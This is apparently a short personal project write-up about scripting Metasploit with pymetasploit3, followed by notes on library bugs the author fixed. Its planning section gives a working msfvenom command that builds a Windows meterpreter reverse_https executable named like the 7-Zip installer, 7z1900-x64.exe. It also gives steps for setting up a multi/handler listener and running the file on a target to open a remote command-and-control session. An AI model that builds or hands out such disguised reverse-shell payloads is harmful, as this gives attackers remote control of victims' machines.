Initial Planning

The following points is what will do:
  • Create malicious exe using msfvenom
    • msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP ADDRESS> LPORT=443 -f exe > 7z1900-x64.exe
  • Run exploit/multi/handler to listen for incoming connection.
    • Set windows/x64/meterpreter/reverse_https as the payload.
    • Ensure the options set for the payload matches the options that you set when creating the msfvenom exe i.e. LHOST and LPORT should be the same.
You will then have to manually transfer and run the exe file on target machine to execute the payload and establish C2 i.e. meterpreter session.

Issues Encountered

During the testing of my codes, there were a few issues that I encountered.

Issue 1

This error occurred when I tried to use the exploit/multi/handler module:
notion image
Using VSCode Debugger, I was able to identify the cause i.e. decode(data) function in
Modified pymetasploit3/ as shown below
def decode(data): return msgpack.unpackb(data, strict_map_key=False)

Issue 2

Another issue I encountered was a SyntaxWarning as shown in the screenshot below:
notion image
This was an easy fix as all I had to do was change from "is not" to "!=".

End Product

If run successfully, you should see a similar output as shown in the screenshot below:
notion image
However, if the handler failed to start i.e. a process/server is using the port that you set for LPORT, then you will see a similar output as shown in the screenshot below:
notion image